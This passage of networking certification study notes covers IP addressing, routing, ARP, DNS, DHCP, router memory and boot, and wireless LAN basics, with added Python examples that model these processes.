– Default number of network bits: 8
– Default number of host bits: 24

• Class B:
– Default network mask: 255.255.0.0
– Default number of network bits: 16
– Default number of host bits: 16

• Class C:
– Default network mask: 255.255.255.0
– Default number of network bits: 24
– Default number of host bits: 8

• We worked just a bit with the network and host bits earlier in this section, and we're going to work with them a lot more in the subnetting sections later in the course. For now, make sure that you know....
– How to identify the class of an IP address
– Which addresses can be assigned to hosts (Class A, B, C)
– Which addresses cannot be assigned to hosts (Class D, E, any address beginning with 127)
– The default network mask, network bits, and host bits for Class A, B, and C addresses

RFC 1918 Private Addresses

• Address classes A, B, and C all have their own reserved range of private addresses. You should be able to recognize an address from any of these ranges immediately.
– Class A: 10.0.0.0 - 10.255.255.255
– Class B: 172.16.0.0 - 172.31.255.255
– Class C: 192.168.0.0 - 192.168.255.255

Page 60: Notes

• You should be ready to identify those ranges in that format, or with the dotted decimal masks, or with prefix notation. More about prefix notation later in this section.
– Class A: 10.0.0.0 255.0.0.0, or 10.0.0.0 /8
– Class B: 172.16.0.0 255.240.0.0, or 172.16.0.0 /12
– Class C: 192.168.0.0 255.255.0.0, or 192.168.0.0 /16
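The rules from the last few slides (dotted decimal to binary, address class by first octet, the default class masks, and the RFC 1918 ranges in all three notations) can be checked with a few lines of Python. This is an added example, not code from the course; the function and table names are mine, and it uses only the standard library ipaddress module.

```python
# Added example (not from the course): IP address classification helpers
# that mirror the rules on these slides. Names such as CLASS_RANGES,
# address_class and classful_summary are this example's own.
from ipaddress import IPv4Address, IPv4Network

# Classful ranges of the first octet, exactly as listed on the slides.
CLASS_RANGES = {
    "A": (1, 126),
    "B": (128, 191),
    "C": (192, 223),
    "D": (224, 239),   # multicast: not assignable to hosts
    "E": (240, 255),   # experimental: not assignable to hosts
}

# Default (classful) masks; the network/host bit split follows from them.
DEFAULT_MASKS = {"A": "255.0.0.0", "B": "255.255.0.0", "C": "255.255.255.0"}

# RFC 1918 private ranges in prefix notation, as on the slide.
RFC1918 = [IPv4Network("10.0.0.0/8"),
           IPv4Network("172.16.0.0/12"),
           IPv4Network("192.168.0.0/16")]


def to_binary(dotted: str) -> str:
    """'192.168.1.100' -> '11000000 10101000 00000001 01100100'."""
    return " ".join(f"{int(octet):08b}" for octet in dotted.split("."))


def mask_to_prefix(mask: str) -> int:
    """Count the leading 1s of a mask: '255.0.0.0' -> 8.
    Rejects a mask whose 1s are not contiguous, such as 255.0.255.0."""
    bits = f"{int(IPv4Address(mask)):032b}"
    ones = bits.rstrip("0")
    if "0" in ones:
        raise ValueError(f"non-contiguous mask {mask}")
    return len(ones)


def prefix_to_mask(prefix: int) -> str:
    """The other direction: 12 -> '255.240.0.0'."""
    return str(IPv4Network(f"0.0.0.0/{prefix}").netmask)


def address_class(dotted: str) -> str:
    """Return 'A'..'E', or 'loopback' for a first octet of 127."""
    first = int(dotted.split(".")[0])
    if first == 127:
        return "loopback"
    for name, (lo, hi) in CLASS_RANGES.items():
        if lo <= first <= hi:
            return name
    raise ValueError(f"first octet {first} is outside every class")


def classful_summary(dotted: str) -> dict:
    """Everything the slides ask you to know about one address."""
    cls = address_class(dotted)
    mask = DEFAULT_MASKS.get(cls)          # None for D, E and loopback
    net_bits = mask_to_prefix(mask) if mask else None
    return {
        "class": cls,
        "assignable": cls in DEFAULT_MASKS,
        "default_mask": mask,
        "network_bits": net_bits,
        "host_bits": 32 - net_bits if net_bits is not None else None,
        "private": any(IPv4Address(dotted) in net for net in RFC1918),
        "binary": to_binary(dotted),
    }


if __name__ == "__main__":
    for ip in ("192.168.1.100", "10.1.1.5", "172.20.0.9", "172.32.0.1",
               "224.0.0.5", "127.0.0.1"):
        print(ip, classful_summary(ip))
```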

• Let's take another look at a PC's ipconfig output.

C:\>ipconfig

Windows IP Configuration

Ethernet adapter Local Area Connection:

        IP Address. . . . . . . . . . . . : 192.168.1.100
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 192.168.1.1

• When this host is ready to send data, there are two and only two possibilities:
– The destination IP address is on the 192.168.1.0 255.255.255.0 network
– It's on another network

Page 61: Notes

• If the destination is on the same subnet as the host, the packet's destination IP address will be that of the destination host. In the following example, this PC is sending packets to 192.168.1.15, a host on the same subnet, so there is no need for the router to get involved. In effect, those packets go straight to 192.168.1.15.

• If 192.168.1.100 wants to send packets to the host at 10.1.1.5, the sending host knows it's not on the same subnet as 10.1.1.5. In that case, the host will send the packets to its default gateway - in this case, the router's ethernet0 interface. The host is basically saying "I have no idea where this address is, so I'll send it to my default gateway and let that device figure it out."

• When a router receives a packet, there are three possibilities regarding its destination:
– Destined for a directly connected network
– Destined for a non-directly connected network that the router has an entry for in its routing table
– Destined for a non-directly connected network that the router does not have an entry for

Page 62: Notes

R1#show ip route
Codes: C - connected, S - static

Gateway of last resort is not set

C    20.0.0.0/8 is directly connected, Ethernet1
C    10.0.0.0/8 is directly connected, Ethernet0

• Also note that you don't see the mask expressed as "255.0.0.0" - you see it as "/8" instead. This is called prefix notation, and the number simply represents the number of 1s at the beginning of the network mask when it's expressed in binary. That "/8" is pronounced "slash eight".

255.0.0.0 = binary string 11111111 00000000 00000000 00000000 = /8

R1#show ip route
Codes: C - connected, S - static

Gateway of last resort is not set

C    20.0.0.0/8 is directly connected, Ethernet1
C    10.0.0.0/8 is directly connected, Ethernet0

Page 63: Notes

• Static routes are created with the ip route command.

R1(config)#ip route 30.0.0.0 255.0.0.0 ethernet1

• The routing table now displays a route for the 30.0.0.0 /8 network. The letter "S" indicates a static route.

R1#show ip route
Codes: C - connected, S - static

C    20.0.0.0/8 is directly connected, Ethernet1
C    10.0.0.0/8 is directly connected, Ethernet0
S    30.0.0.0/8 is directly connected, Ethernet1
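The two forwarding decisions described over the last few pages (the host's "same subnet or default gateway" choice, and the router's "connected, in the table, or no route" lookup) in working form. This is an added example, not code from the course: the routing table is modelled on the show ip route output above, the host settings are the ipconfig values from earlier, and the function names are mine. It also applies the longest-prefix rule a real router uses when more than one entry matches, which the slides do not discuss.

```python
# Added example (not from the course): the host and router forwarding
# decisions from these slides. host_next_hop, router_lookup and
# add_static_route are this example's own names.
from ipaddress import IPv4Address, IPv4Interface, IPv4Network


def host_next_hop(host_cfg: str, gateway: str, dest: str):
    """host_cfg is 'address/mask' as ipconfig shows it, e.g.
    '192.168.1.100/255.255.255.0'. Returns ('direct', dest) when dest is on
    the host's own subnet, otherwise ('gateway', gateway): the host hands the
    packet to its default gateway and lets that device figure it out."""
    iface = IPv4Interface(host_cfg)
    if IPv4Address(dest) in iface.network:
        return ("direct", dest)
    return ("gateway", gateway)


# Routing table entries: (code, network, exit interface).
# 'C' = directly connected, 'S' = static, as in the Codes line above.
ROUTING_TABLE = [
    ("C", IPv4Network("20.0.0.0/8"), "Ethernet1"),
    ("C", IPv4Network("10.0.0.0/8"), "Ethernet0"),
    ("S", IPv4Network("30.0.0.0/8"), "Ethernet1"),
]


def add_static_route(table, network: str, mask: str, out_iface: str):
    """The effect of 'ip route 30.0.0.0 255.0.0.0 ethernet1' on the table."""
    table.append(("S", IPv4Network(f"{network}/{mask}"), out_iface))
    return table


def router_lookup(table, dest: str):
    """Return (verdict, exit interface). The verdict is one of the three
    possibilities on the slide: 'connected', 'routed' (a non-connected
    network the table has an entry for) or 'no route'. If several entries
    match, the most specific (longest prefix) wins. With no gateway of last
    resort set, 'no route' means the packet is dropped."""
    addr = IPv4Address(dest)
    matches = [entry for entry in table if addr in entry[1]]
    if not matches:
        return ("no route", None)
    code, _, out_iface = max(matches, key=lambda e: e[1].prefixlen)
    return ("connected" if code == "C" else "routed", out_iface)


if __name__ == "__main__":
    print(host_next_hop("192.168.1.100/255.255.255.0", "192.168.1.1", "192.168.1.15"))
    print(host_next_hop("192.168.1.100/255.255.255.0", "192.168.1.1", "10.1.1.5"))
    for dest in ("10.1.1.5", "30.2.3.4", "40.0.0.1"):
        print(dest, router_lookup(ROUTING_TABLE, dest))
```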

Video 6: ARP, DNS and DHCP

Page 64: Notes

ARP, DNS and DHCP

• One Destination, Two Destination Addresses
• DNS
• The ARP Process
• Routers, Broadcasts, and Proxy ARP
• The DHCP Process
• Configuring DHCP on a Cisco Router With SDM

• As network admins, we spend a lot of time concerning ourselves with IP addresses - assigning them, filtering them, etc. We don't think about MAC addresses that often, but data going from Host A to Host B must have a destination IP address for Host B and a destination MAC address as well.

• To get these two required destination addresses, Host A will use two separate protocols:
– Domain Name System (DNS) for the IP address
– Address Resolution Protocol (ARP) for the MAC address

• Host A will require the IP address first, since it must know the IP address of the remote host in order for the ARP process to work properly. Let's take a quick look at the DNS process.

Page 65: Notes

• Host A will know the computer name of Host B - for this discussion we'll assume that name to be "hostb". Now it needs an IP address and a MAC address for that hostname, and DNS will help it get that IP address. The DNS process is very simple. Each host will have the IP address of a DNS server, and a host needing the IP address of another host will send a DNS Request to the DNS server.

• The natural question is "How does Host A know the IP address of the DNS server in the first place?" That happens in one of two ways:
– The DNS server address is hard-coded on Host A
– The DNS server address was learned via DHCP

• We're going to take a look at DHCP later in this section, but here's the partial output of ipconfig /all on a Windows PC using DHCP. The DNS server IP addresses are in bold.

C:\>ipconfig /all

Windows IP Configuration

        Host Name . . . . . . . . . . . . :
        Primary Dns Suffix  . . . . . . . :
        Node Type . . . . . . . . . . . . : Hybrid

Ethernet adapter Local Area Connection:

        Connection-specific DNS Suffix  . :
        Description . . . . . . . . . . . : Intel(R) 82562V 10/100 Network Connection
        Physical Address. . . . . . . . . : 00-17-31-F7-03-B2
        Dhcp Enabled. . . . . . . . . . . : Yes
        Autoconfiguration Enabled . . . . : Yes
        IP Address. . . . . . . . . . . . : 192.168.1.100
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 192.168.1.1
        DHCP Server . . . . . . . . . . . : 192.168.1.1
        DNS Servers . . . . . . . . . . . : 68.87.73.242
                                            68.87.71.226
        Lease Obtained. . . . . . . . . . : Monday, October 08, 7:23:17 AM
        Lease Expires . . . . . . . . . . : Tuesday, October 09, 7:23:17 AM

Page 66: Notes

• In our current network, we have a DNS server that took care of the hostname-IP address resolution, but now we need the MAC address of Host B, and there is no ARP server on the network. Instead, the ARP process uses a series of broadcasts and replies.

• Host A is the host needing a MAC address of a remote device, so it'll be Host A that sends out the initial ARP Request. This request is a Layer 2 broadcast, meaning....
– The source MAC address will be that of Host A
– The destination MAC address will be ff-ff-ff-ff-ff-ff
– The source IP address will be that of Host A
– The destination IP address will be that of Host B (learned via DNS)

• As network admins, we're always interested in limiting the number of broadcasts on our network. Along those lines, hosts build ARP caches that they consult before sending out ARP Requests. These caches contain an IP address - MAC address mapping table such as the one shown here on a Windows PC with the command arp -a:

C:\>arp -a

Internet Address      Physical Address      Type
10.1.1.2              bb-bb-bb-bb-bb-bb     dynamic

Page 67: Notes


• After learning Host B's IP and MAC addresses (MAC addresses are also called "physical addresses" because they physically exist on the network card), Host A would enter them into its ARP cache. The next time Host A needs to send data to Host B, the information needed to do so is right there in the ARP cache and no ARP Request needs to be sent.


• In that example, all of the devices were on the same physical cable. That's good for an example, but more likely we're going to have something like this:


• The switch does not impact the ARP process at all. Why? Because switches forward broadcasts, and that's just what the ARP Request is as indicated by its destination MAC address of ff-ff-ff-ff-ff-ff. The switch will send a copy of that ARP Request out every single port except the one it came in on.

Page 68: Notes

• If Host A sends an ARP Request for Host B's MAC address, we know the switch will forward it, because switches forward broadcasts. The problem comes in with the router, because routers do not forward broadcasts. Instead, the router will use proxy ARP to answer the ARP Request with the MAC address of the router interface that received the original Request.

• Interestingly enough, Host A has no idea that the MAC address it received in the ARP Response is actually not that of Host B, but rather that of the Ethernet0 interface of the router. All Host A knows is that it sent an ARP Request and got a Response. Now when Host A sends data to Host B, the data will have the following destinations:
– IP destination address is Host B's IP address
– MAC destination address is the one assigned to the router's E0 interface
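The ARP sequence from the last three pages as a small simulation: the cache check, the Layer 2 broadcast, the switch flooding it out of every port but the one it came in on, and a router answering by proxy for a host it can reach. This is an added example and not code from the course; the Host, Router and Switch classes are mine, and every address in it is constructed for the example.

```python
# Added example (not from the course): a toy model of ARP on one switched
# segment as the slides describe it. The class and function names are this
# example's own; all addresses are constructed.
from dataclasses import dataclass, field
from ipaddress import IPv4Address, IPv4Network

BROADCAST_MAC = "ff-ff-ff-ff-ff-ff"


@dataclass
class ArpRequest:
    sender_ip: str
    sender_mac: str
    target_ip: str
    dst_mac: str = BROADCAST_MAC     # what makes it a Layer 2 broadcast


@dataclass
class Host:
    ip: str
    mac: str
    arp_cache: dict = field(default_factory=dict)   # IP -> MAC

    def handle(self, req: ArpRequest, iface: str):
        """A host answers only for its own IP address."""
        return self.mac if req.target_ip == self.ip else None


@dataclass
class Router:
    # interface name -> (interface IP, interface MAC, connected network)
    interfaces: dict

    def handle(self, req: ArpRequest, iface: str):
        ip, mac, _ = self.interfaces[iface]
        if req.target_ip == ip:
            return mac                    # the request was for the router itself
        # Proxy ARP: the target sits on a network behind another interface,
        # so answer with the MAC of the interface the Request arrived on.
        target = IPv4Address(req.target_ip)
        for name, (_, _, net) in self.interfaces.items():
            if name != iface and target in IPv4Network(net):
                return mac
        return None                       # the broadcast itself is never forwarded


class Switch:
    def __init__(self, ports: dict):
        self.ports = ports     # switch port -> (attached device, its interface name)

    def flood(self, req: ArpRequest, in_port: str):
        """A broadcast goes out every port except the one it arrived on."""
        replies = []
        for port, (device, iface) in self.ports.items():
            if port == in_port:
                continue
            mac = device.handle(req, iface)
            if mac:
                replies.append(mac)
        return replies


def resolve(host: Host, target_ip: str, switch: Switch, host_port: str):
    """Return (destination MAC, how it was learned) for a frame to target_ip.
    The cache is consulted first; a Request is broadcast only on a miss, and
    the answer is cached so the next frame needs no Request at all. Note that
    the host cannot tell a proxy reply from the real owner's reply."""
    if target_ip in host.arp_cache:
        return host.arp_cache[target_ip], "cache"
    req = ArpRequest(host.ip, host.mac, target_ip)
    replies = switch.flood(req, host_port)
    if not replies:
        return None, "no reply"
    host.arp_cache[target_ip] = replies[0]
    return replies[0], "arp"
```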


• There are also other forms of ARP that operate in today's networks, such as Reverse ARP and Inverse ARP. Those are not protocols you need to know for your CCENT studies -- you'll see them during your CCNA studies. For now, and for the CCENT exam, make sure you know how ARP operates, what it does, and when proxy ARP needs to be used - and that's when there is a router between the two involved hosts.

Page 69: Notes

• A host's ability to send data to all the required destinations requires quite a bit of information. The host needs to know the following at a minimum...
– What's my IP address?
– What's my network mask?
– What are the IP addresses of the DNS servers?
– What's my default gateway?

• How do we get all of this information to and on our network hosts? We've got two options:
– Visit each workstation and configure the information manually
– Enable each workstation for DHCP

• And sooner or later, some of that information is going to change and the hosts will need to know about these changes.

• If you previously hard-coded the information on all of the hosts, you'll now have to go out and visit every workstation again and change the information manually.

• If you used DHCP to begin with, you now just have to change the information on the DHCP server.

• DHCP is starting to sound pretty good! When the choice is visiting the hundreds or thousands of hosts on a typical network manually or using DHCP to dynamically handle IP address assignment information, there really is no choice.

Page 70: Notes

• There are four basic steps that allow a host (the DHCP Client) to acquire all of this information from a DHCP Server. The Client begins the process by sending a DHCP Discover message out. This message is a broadcast, so it will not be forwarded by routers.

• Any DHCP Server that receives that message will respond with a DHCP Offer. The Offer contains the following:
– The IP address the DHCP Server is offering to the Client
– The network mask the DHCP Server is offering to the Client
– The amount of time the Client can keep this information if the Offer is accepted (the lease)
– The IP address of the DHCP Server that is making the offer

• Since the original DHCP Discover sent by the host is a broadcast, more than one DHCP Server may see it and respond with an Offer, as shown above. In this case, the host will respond to the first Offer it receives with a DHCP Request.

• The Request has the IP address of the DHCP Server that sent the accepted Offer. When the other DHCP Server(s) see that their Offer was not accepted, they put the offered IP address back into their address pools. This DHCP Request is also a broadcast.
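The four-step exchange above, played out with two servers answering one Discover, so you can watch the unaccepted server return its address to the pool. This is an added example, not code from the course; the Offer, DhcpServer and dhcp_exchange names are mine, the fourth message is the DHCP Acknowledgement the accepted server sends back, and all addresses and pool sizes are constructed for the example.

```python
# Added example (not from the course): a toy model of the DHCP messages on
# these slides. Names such as DhcpServer and dhcp_exchange are this
# example's own; addresses and pools are constructed.
from dataclasses import dataclass, field


@dataclass
class Offer:
    server_ip: str       # the IP address of the server making the offer
    client_ip: str       # the address being offered to the client
    mask: str            # the network mask being offered
    lease_seconds: int   # how long the client may keep the information


@dataclass
class DhcpServer:
    ip: str
    mask: str
    lease_seconds: int
    pool: list                                    # free addresses
    offered: dict = field(default_factory=dict)   # client MAC -> offered IP
    leases: dict = field(default_factory=dict)    # client MAC -> leased IP

    def on_discover(self, client_mac: str):
        """Step 2: answer a Discover with an Offer, reserving one address."""
        if not self.pool:
            return None                 # nothing left to offer; stay silent
        ip = self.pool.pop(0)
        self.offered[client_mac] = ip
        return Offer(self.ip, ip, self.mask, self.lease_seconds)

    def on_request(self, client_mac: str, chosen_server: str):
        """Step 3/4: the broadcast Request names the server whose Offer was
        accepted. That server acknowledges; every other server that offered
        puts its address back into the pool."""
        ip = self.offered.pop(client_mac, None)
        if ip is None:
            return None                 # we never offered this client anything
        if chosen_server == self.ip:
            self.leases[client_mac] = ip
            return ("ACK", ip)          # DHCP Acknowledgement
        self.pool.insert(0, ip)         # offer not accepted: address goes back
        return None


def dhcp_exchange(client_mac: str, servers: list):
    """Steps 1-4 from the client's point of view. The Discover and the
    Request are broadcasts, so every server on the segment sees both."""
    offers = [o for o in (s.on_discover(client_mac) for s in servers) if o]
    if not offers:
        return None                     # no server answered the Discover
    accepted = offers[0]                # the slide: the first Offer received wins
    acks = [a for a in (s.on_request(client_mac, accepted.server_ip)
                        for s in servers) if a]
    if acks != [("ACK", accepted.client_ip)]:
        raise RuntimeError(f"unexpected acknowledgements: {acks}")
    return {"ip": accepted.client_ip, "mask": accepted.mask,
            "server": accepted.server_ip, "lease": accepted.lease_seconds}


if __name__ == "__main__":
    s1 = DhcpServer("192.168.1.1", "255.255.255.0", 86400, ["192.168.1.100"])
    s2 = DhcpServer("192.168.1.2", "255.255.255.0", 3600, ["192.168.1.200"])
    print(dhcp_exchange("aa-aa-aa-aa-aa-aa", [s1, s2]))
    print("server 2 pool after the exchange:", s2.pool)
```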

Page 71: Notes

• You can see the IP address a host has been assigned, along with the lease length and other information, with ipconfig /all. You can verify that the host is running DHCP with this command as well.

C:\>ipconfig /all

        Description . . . . . . . . . . . : Intel(R) 82562V 10/100 Network Connection
        Physical Address. . . . . . . . . : 00-17-31-F7-03-B2
        Dhcp Enabled. . . . . . . . . . . : Yes
        Autoconfiguration Enabled . . . . : Yes
        IP Address. . . . . . . . . . . . : 192.168.1.100
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 192.168.1.1
        DHCP Server . . . . . . . . . . . : 192.168.1.1
        DNS Servers . . . . . . . . . . . : 68.87.73.24
                                            68.87.71.22
        Lease Obtained. . . . . . . . . . : Monday, October 08, 200x 7:23:17 AM
        Lease Expires . . . . . . . . . . : Tuesday, October 09, 200x 7:23:17 AM

• Many Cisco router models can be configured to operate as DHCP servers. On some models, we're limited to using the command-line interface to write the DHCP config, and I'll be the first to say that can be a little tricky. Cisco is making a big push toward GUI-based tools, and the GUI we'll look at here is the Security Device Manager (SDM). This tool makes DHCP configurations a breeze!

• In this lab, we'll use SDM to configure a Cisco router as a DHCP server, and then test that configuration.

Page 72: Notes

Video 7: Memory Components And Config Files

Memory Components And Config Files

• ROM, RAM, NVRAM, And Flash
• The Boot Process
• Setup Mode
• Startup And Running Configuration Files
• The COPY Command
• IOS Upgrading
• The Configuration Register

• ROM: Read-Only Memory. ROM stores the router’s bootstrap startup program, operating system software, and power-on diagnostic test programs (POST).

• Flash Memory: Generally referred to simply as “flash”, the IOS images are held here. Flash is erasable and reprogrammable ROM. Flash memory content is retained by the router on reload.

Page 73: Notes

• RAM: Random-Access Memory. Stores operational information such as routing tables and the running configuration file. RAM contents are lost when the router is powered down or reloaded. By default, routers look here first for an Internetwork Operating System (IOS) file during boot.

• NVRAM: Non-volatile RAM. NVRAM holds the router’s startup configuration file. NVRAM contents are not lost when the router is powered down or reloaded.

• Some important comparisons:
– RAM contents are lost on reload, where NVRAM and Flash contents are not.
– NVRAM holds the startup configuration file, where RAM holds the running configuration file.

• We'll talk about the startup and running configuration files later in this section. Let's take a look at the boot process of a Cisco router, and then talk about the dreaded Setup Mode!

• When a Cisco router powers up, it first runs a series of POSTs (Power-On Self Test). A POST is a series of diagnostic tests designed to verify the basic operation of the network interfaces, memory, and the CPU.

Page 74: Notes

• POSTs are particularly effective at detecting major problems early in the boot process, such as a broken fan. If the POST detects such a problem (usually called an "environmental factor") that would cause the router or switch to overheat after booting, the POST will fail, give you a clear message as to why the POST failed, and will then stop the boot process.

• But let's speak positively here!

• After the router passes the POST, it looks for a source from which to load a valid Internetwork Operating System (IOS) image. The router has three sources from which it can load an IOS image, and it's a good idea to know these sources and the order in which the router will look in each for that image:
1. Flash memory (the default).
2. A TFTP server (Trivial File Transfer Protocol).
3. Read-Only Memory (ROM).

• To change that order, a change must be made to the configuration register. It's similar to the Microsoft Registry in that you should never change this value unless you are sure of the result.

• Once the IOS is found, the router looks for a valid startup configuration file. By default, the router will look for the startup configuration file in Non-volatile RAM (NVRAM). If there's no startup file there, the router looks for a TFTP Server that has a startup file.

Page 75: Notes

• If no valid startup configuration file is found, the router enters setup mode, where the router runs the system configuration dialogue, a series of questions involving basic router setup.

• Believe it or not, when you take a Cisco router or switch out of the box and boot it up for the first time, it's dumber than a bag of rocks.

• Well, not quite. It's not dumb, you just haven't told it anything yet. A router doesn't magically know what IP addresses you want to assign to its interfaces, what security features you do and do not want to run, or any of your other preferences! We've got two ways to tell it these things:
– Setup Mode
– Manually configuring all of this information at the Command-Line Interface (CLI)

• We actually have two configuration files running on a router at any time, the startup-config and running-config files. Most of the time they're the same thing, but there is an important difference between the two when you've configured the router but have not yet saved that new configuration.

Page 76: Notes

• As you go through your Cisco studies and your Cisco career, you'll use the copy command more often than you might think. It's a good idea to remember the command syntax:
– The first location is where you're copying from
– The second location is where you're copying to

• You can see that the commands copy run start and copy start run are going to have vastly different meanings. That's good to keep in mind for both your exams and working on production networks!
– copy run start -- Copying the running config over the startup config
– copy start run -- Copying the startup config over the running config

• And why would you ever need to back up these config files? I've seen three different situations where these backups came in handy. In order of probability:
– Network attackers changing or deleting the config
– An honest mistake made by a network admin
– Just as any file can become corrupt over time, so can a startup-config file

Page 77: Notes

• On occasion, the trickiest part of changing a router's IOS image is actually getting the image you want! You can download new IOSes from Cisco's website, but a Cisco Connection Online (CCO) login is not enough. The rules change as to who can and cannot download IOS images, so I won't list those rules here, but you can find out quickly by searching Cisco's site. Just keep in mind that you can't just go out to Cisco's website to download the latest IOS image for your router on a whim.

• If you have to perform an IOS upgrade, you might be tempted to do so remotely rather than physically visit the client site - until you see the following warning! I've telnetted into a router and issued the copy tftp flash command, and that means we're copying from a TFTP server to the router's Flash.

• Here's the warning I received, and I've bolded the very, very important part:

BRYANT_AS_5#copy tftp flash
**** NOTICE ****
Flash load helper v1.0
This process will accept the copy options and then terminate
the current system image to use the ROM based image for the copy.
Routing functionality will not be available during that time.
If you are logged in via telnet, this connection will terminate.
Users with console access can see the results of the copy
operation.
---- ******** ----

[There are active users logged into the system]
Proceed? [confirm]

Page 78: Notes

• As the new IOS is loaded, you'll see a series of exclamation points. It looks like a massive ping, as you can end up with screens of "!". If those exclamation points stop for a few seconds, that's okay, but if they stop and don't restart, there's a problem with the copy.

• Once you do finish copying the new IOS to Flash, this is one of the rare occasions where you have to reload the router for the change to take effect. Before copying to Flash, though, run show flash to see how much room you have left in Flash! The following output indicates that we don't have much room left on this particular router, so copying a new IOS image to this router without deleting the current one is just about impossible.

• This has always been an awkward subject for me to teach and write about, because I feel like I'm teaching you something and then telling you never to use the knowledge!

• One day, you will have to change the config register, most likely to perform a password recovery. I will just give this warning one time: If you change the register to an incorrect value and then reload the router, you can cripple the router and even Cisco can't bring it back.

Page 79: Notes

• To review these common configuration register settings:
– 0x2102: The default. Router looks for a startup configuration file in NVRAM and for a valid IOS image in Flash.
– 0x2142: NVRAM contents are bypassed, startup configuration is ignored.
– 0x2100: Router boots into ROM Monitor mode.

• A real-world reminder: When you change the configuration register value to perform password recovery, don't forget to change it back and then reload the router!

Video 8: Intro to Wireless Networks (WLANs)

Page 80: Notes

Intro to Wireless Networks (WLANs)

• Wireless Network Types
• Standards and Ranges
• Spread Spectrum
• Antenna Types
• CA vs. CD
• SSIDs and MAC Address Authentication
• WEP, WPA, and WPA2

• Wireless networks are created by configuring Wireless Access Points (WAP or AP, depending on documentation). If you're connecting to the Internet or your company's network from a hotel or restaurant, you're connected to a lily pad network.

• Unlike the physical networks we've discussed previously in this course, the WAPs in a lily pad network can be owned by different companies. The WAPs create hotspots where Internet access is available to anyone with a wireless host - and hopefully, a username and password is required as well!

• WAPs are not required to create a wireless network. In an ad hoc WLAN ("wireless LAN"), the wireless devices communicate with no WAP involved. Ad hoc networks are also called Independent Basic Service Sets (iBSS or IBSS, depending on whose documentation you're reading).

Page 81: Notes

• A much more common wireless configuration is an infrastructure WLAN, where a WAP is used to allow multiple devices to connect to the wired network. All communications in an infrastructure WLAN must go through a wireless access point (AP).

• There are two kinds of infrastructure WLANs, with the most common being the following topology. While a Basic Service Set (BSS) will have a single AP, Extended Service Set WLANs (ESS) have multiple access points.

• If you've ever used a wireless network while traveling, you were on an ESS. Such a network uses multiple APs to create overlapping areas of coverage, called cells. While your signal may occasionally get weak near the point of overlapping, the ESS allows roaming users to hit the network at any time. (We hope!)

• We went over three different service set types in that section, so to review:
– Independent Basic Service Sets have no APs; the few wireless devices involved interact directly.
– Basic Service Sets have a single AP.
– Extended Service Sets have multiple APs, which allow for a larger coverage area than the other two types and also allow roaming users to fully utilize the WLAN.

Page 82: Notes

• The standards listed here are all part of the 802.11x standards developed by the IEEE. IEEE uses the 802.11 standard to define Wi-Fi overall, but it's a good idea to know the stats for the following.

• 802.11a has a typical data rate of 25 Mbps, but can reach speeds of 54 Mbps. Indoor range is 100 feet. Operating frequency is 5 GHz.

• 802.11b has a typical data rate of 6.5 Mbps, but can reach speeds of 11 Mbps. Indoor range is 100 feet. Operating frequency is 2.4 GHz.

• 802.11g has a typical data rate of 25 Mbps, a peak data rate of 54 Mbps, and an indoor range of 100 feet. Operating frequency is 2.4 GHz. 802.11b and 802.11g are compatible to the point where many wireless routers and cards that use these standards are referred to as "802.11b/g", or just "b/g".

• 802.11n has a typical data rate of 200 Mbps, a peak data rate of 540 Mbps, and an indoor range of 160 feet. Operating frequency is either 2.4 GHz or 5 GHz.

Infrared Wireless

• Infrared wireless offers a high data rate, but a very short range - generally too short to be practical.

Page 83: Notes

• It's a very good idea to have those maximum speeds, ranges, and frequencies memorized for the exam. For real-world wireless networks, always keep in mind that maximum speeds and ranges are theoretical at best. That's particularly true with wireless networks, which can suffer from unusual and unexpected sources of interference, such as weather, signal attenuation, and popcorn.

Popcorn?

• You can have trouble with 802.11g from a highly unexpected source. Microwave ovens also share the 2.4 GHz band, and the presence of a microwave in an office can actually cause connectivity issues. (And you thought they were just annoying when people burn popcorn in them!) Solid objects such as walls and other buildings can disturb the signal in any bandwidth. Some wireless phones cause the same problem.

Spread Spectrum

• This is another one of those "the name is the recipe" terms. Spread spectrum refers to a method of spreading a signal over a range, or spectrum, of frequencies. One popular method is frequency-hopping spread spectrum (FHSS), where the sender and receiver agree on the range of frequencies to use, and during the transmission the signal will be sent over this range.

Page 84: Notes

84

© Train Signal, Inc., 2002-2007

• DSSS (Direct Sequence Spread Spectrum) doesn't have the signal hop around between frequencies, but instead spreads the signal over the entire range of frequencies at once. 11.b, 11.g, and 11.n use DSSS.

• OFDM (Orthogonal Frequency Division Multiplexing) splits the channel into many closely spaced subcarriers and sends part of the data over each of them at the same time. 802.11a uses OFDM, and so do 802.11g and 802.11n; 802.11g keeps DSSS only for the lower data rates it shares with 802.11b.

• Now, why do we go through all this? There are several good reasons to spread a signal:
– increased resistance to noise
– allows sharing of a frequency band
– more difficult to intercept

• Don't read that last point as a security feature. The chipping codes, hop sequences, and subcarrier layouts used by 802.11 are published in the standard, so any 802.11 card can receive any 802.11 signal. Confidentiality on a WLAN comes from encryption (WPA2), never from the modulation.

Antenna Types

• A Yagi antenna (technically, the full name is "Yagi-Uda antenna") sends its signal in a single direction, which means it must be aligned correctly and kept that way. Yagi antennas are sometimes called directional antennas, since they send their signal in a particular direction. In contrast, an Omni antenna sends a signal in all directions.

• Like some other topics we've covered in this course, both of these are known by several different names. Yagis are also known as point-to-point and directional antennas; Omni antennas are also known as omnidirectional and point-to-multipoint antennas.

• Both Yagi and Omni antennas have their place in wireless networks. The unidirectional signal a Yagi antenna sends makes it particularly helpful in bridging the distance between WAPs, and it also limits where outside the building the signal can be picked up. The omnidirectional signal sent by Omni antennas helps connect hosts to WAPs, including roaming laptop users -- like the ones who connect to the Net while eating lunch!

• Ethernet has CSMA/CD, and wireless networking has CSMA/CA, Carrier Sense Multiple Access with Collision Avoidance. CSMA/CA works much the same as CSMA/CD...
– a host that wants to transmit must listen first to see if another host is transmitting
– if the channel is idle, the host starts a random backoff timer. When that timer expires, the host listens one more time and then transmits. (A lot more listening with CSMA/CA!)
– if the channel is busy, the host cannot transmit; it waits for the channel to go idle and then runs its backoff timer

• So what's the real difference between CSMA/CD and CSMA/CA? CA is used on wireless networks, and jam signals are not sent over a wireless network. A radio cannot listen for a collision while it is transmitting, so collisions are not detected on a wireless network; they can only be avoided, and that is why we use CSMA/CA instead of CSMA/CD. Because the sender cannot detect a collision itself, the receiver sends an acknowledgment frame for every unicast frame it gets, and a missing acknowledgment tells the sender to retransmit.

• Another difference - while Ethernet is capable of full-duplex (simultaneously sending and receiving data), wireless clients are limited to half-duplex.

